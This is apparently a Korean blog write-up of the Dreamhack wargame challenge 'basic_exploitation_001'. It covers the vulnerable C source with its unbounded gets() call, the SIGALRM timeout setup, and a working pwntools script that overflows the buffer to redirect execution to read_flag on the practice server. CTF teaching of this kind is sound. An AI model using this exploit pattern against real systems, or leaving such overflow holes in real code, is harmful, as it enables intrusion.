[Dreamhack] Level 1: basic_exploitation

CTF, War game

[Dreamhack] Level 1: basic_exploitation_001

mnzy🌱 2024. 10. 12. 20:37

1. 문제

https://dreamhack.io/wargame/challenges/3

basic_exploitation_001

Description 이 문제는 서버에서 작동하고 있는 서비스(basic_exploitation_001)의 바이너리와 소스 코드가 주어집니다. 프로그램의 취약점을 찾고 익스플로잇해 "flag" 파일을 읽으세요. "flag" 파일의 내용

dreamhack.io

이 문제는 서버에서 작동하고 있는 서비스(basic_exploitation_001)의 바이너리와 소스 코드가 주어집니다.
프로그램의 취약점을 찾고 익스플로잇해 "flag" 파일을 읽으세요.
"flag" 파일의 내용을 워게임 사이트에 인증하면 점수를 획득할 수 있습니다.
플래그의 형식은 DH{...} 입니다.

2. 해결 과정

(1) 문제 분석

먼저 적용된 보호 기법은 아래와 같다. (문제에서도 확인 가능)

NX를 제외하고는 적용된 보호 기법이 없다.

이 문제는 바이너리 파일과 함께 소스코드를 제공한다.

alarm_handler 함수: "TIME OUT"을 출력하고 프로그램을 종료한다.
initialize() 함수: SIGALRM 시그널 핸들러를 설정한 뒤, 30초 후에 알람이 울리도록 설정한다.
- SIGALRM 시그널을 받으면 alarm_handler 함수가 호출되어 타임아웃 출력 후 프로그램 종료

SIGALRM이란 Unix 계열 운영 체제에서 사용되는 시그널(signal) 중 하나이다.

시그널(Signal)이란?
- 프로세스 간 통신을 위한 소프트웨어 인터럽트
- 운영 체제나 다른 프로세스가 프로세스에 어떤 이벤트가 발생했음을 알리는 방법
SIGALRM:
- SIGALRM은 "alarm clock" 시그널입니다.
- 주로 alarm() 함수나 setitimer() 함수와 함께 사용
- 지정된 시간이 경과했을 때 프로세스에 전달
SIGALRM의 주요 용도:
- 타임아웃 구현: 특정 작업이 정해진 시간 내에 완료되지 않으면 프로그램을 종료하거나 다른 동작을 수행하게 할 수 있다.
- 주기적인 작업 실행: 일정 간격으로 반복되는 작업을 구현할 때 사용할 수 있다.

SIGALRM은 프로그램에 시간 제한을 둠으로써, 무한 루프나 긴 실행 시간으로 인한 자원 고갈을 방지하고, 타임아웃 기반의 동작을 구현하는 데 유용하게 사용된다.

- claude 사용

main에서는 128바이트(0x80) 크기의 버퍼를 선언하고 initialize 함수를 호출한 뒤, gets() 함수로 사용자 입력을 받는다.

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


void read_flag() {
    system("cat /flag");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();
    
    gets(buf);

    return 0;
}

gets()함수는 bof취약점이 있는 대표적인 함수 중 하나이다.

입력값의 크기를 사용자가 임의로 키울 수 있기 때문이다.

따라서 버퍼(0x80)보다 큰 값을 입력하여 return 주소의 값을 덮어써 read_flag 함수를 호출 시킬 것이다.

그러기 위해서는 gdb로 read_flag 함수의 주소값을 확인하였다. (IDA로도 확인 가능)

PIE (Position Independent Executable)가 비활성화되어 있기 때문에, 실행 파일의 코드 섹션 주소는 고정되어 있기 때문에 주소값을 그대로 사용할 수 있다.

info functions {찾는 특정 함수 이름}

(2) 익스플로잇

pwntools를 이용해서 아래 코드를 작성하였다.

from pwn import *

# 서버 연결 접속 정보
host = 'host3.dreamhack.games'
port = 10381

context.log_level = 'debug'

# 서버 연결
conn = remote(host, port)

# read_flag 함수의 주소 
read_flag_addr = 0x080485b9 

# 페이로드 
payload = b'A' * 0x80  # buf의 크기
payload += b'B' * 4    # saved ebp
payload += p32(read_flag_addr)  # return address를 read_flag 함수의 주소로 덮어씀 

print(f"payload: {payload}")

# 페이로드 전송
conn.sendline(payload)

print("waiting for response...")

# 응답 수신 및 출력
response = conn.recvall()
print(response.decode())

# 연결 종료
conn.close()

(3) 플래그